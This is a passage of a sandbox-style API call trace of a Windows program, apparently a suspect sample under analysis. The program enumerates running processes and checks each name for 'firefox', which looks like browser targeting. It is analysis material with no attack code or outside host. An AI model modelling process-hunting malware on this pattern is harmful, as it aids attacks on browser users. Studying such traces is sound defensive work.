WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.124] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3574568 [0095.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3574568, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0095.124] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0095.124] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="firefox") returned 0x0 [0095.124] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0095.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.125] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35726f0 [0095.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x35726f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0095.125] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0095.126] StrStrIA (lpFirst="omnipos.exe", lpSrch="firefox") returned 0x0 [0095.126] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0095.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.127] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572738 [0095.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3572738, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0095.127] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0095.127] StrStrIA (lpFirst="spcwin.exe", lpSrch="firefox") returned 0x0 [0095.127] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0095.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0095.132] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3574828 [0095.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3574828, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0095.132] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0095.132] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="firefox") returned 0x0 [0095.132] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0095.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.133] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3572750 [0095.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3572750, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0095.133] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0095.133] StrStrIA (lpFirst="utg2.exe", lpSrch="firefox") returned 0x0 [0095.133] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0095.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.134] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35724f8 [0095.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x35724f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0095.135] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0095.135] StrStrIA (lpFirst="saying.exe", lpSrch="firefox") returned 0x0 [0095.135] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0095.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.141] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3572480 [0095.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3572480, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0095.141] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0095.141] StrStrIA (lpFirst="ripe.exe", lpSrch="firefox") returned 0x0 [0095.141] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0095.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.143] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572498 [0095.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3572498, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0095.143] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0095.143] StrStrIA (lpFirst="acoustic.exe", lpSrch="firefox") returned 0x0 [0095.143] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0095.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.144] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35724b0 [0095.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x35724b0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0095.144] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0095.144] StrStrIA (lpFirst="mail.exe", lpSrch="firefox") returned 0x0 [0095.144] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0095.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.145] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572690 [0095.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3572690, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0095.146] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0095.146] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox") returned 0x0 [0095.146] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.147] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35724c8 [0095.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35724c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.147] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.147] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0095.147] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0095.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.148] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35725e8 [0095.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x35725e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.148] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0095.148] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox") returned 0x0 [0095.148] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.150] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35726a8 [0095.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35726a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.150] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.150] StrStrIA (lpFirst="taskhostw.exe", lpSrch="firefox") returned 0x0 [0095.150] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0095.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.151] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35724e0 [0095.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x35724e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0095.151] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0095.151] StrStrIA (lpFirst="UsoClient.exe", lpSrch="firefox") returned 0x0 [0095.151] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.152] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572780 [0095.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3572780, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.152] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.152] StrStrIA (lpFirst="taskhostw.exe", lpSrch="firefox") returned 0x0 [0095.152] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0095.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0095.154] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3574808 [0095.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3574808, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0095.154] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0095.154] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="firefox") returned 0x0 [0095.154] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0095.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.155] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3574508 [0095.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3574508, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0095.155] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0095.155] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="firefox") returned 0x0 [0095.155] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0095.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0095.157] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356ae20 [0095.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356ae20, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0095.157] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0095.157] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="firefox") returned 0x0 [0095.157] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0095.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.158] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572810 [0095.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3572810, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.158] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0095.158] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox") returned 0x0 [0095.158] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0095.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.160] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35728e8 [0095.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35728e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.160] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0095.160] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox") returned 0x0 [0095.160] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.161] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572798 [0095.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572798, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.161] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.161] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0095.161] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0095.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.162] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35727b0 [0095.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x35727b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0095.162] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0095.162] StrStrIA (lpFirst="rxodge.exe", lpSrch="firefox") returned 0x0 [0095.162] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0095.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.164] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35727f8 [0095.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x35727f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0095.164] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0095.164] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox") returned 0x0 [0095.164] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, 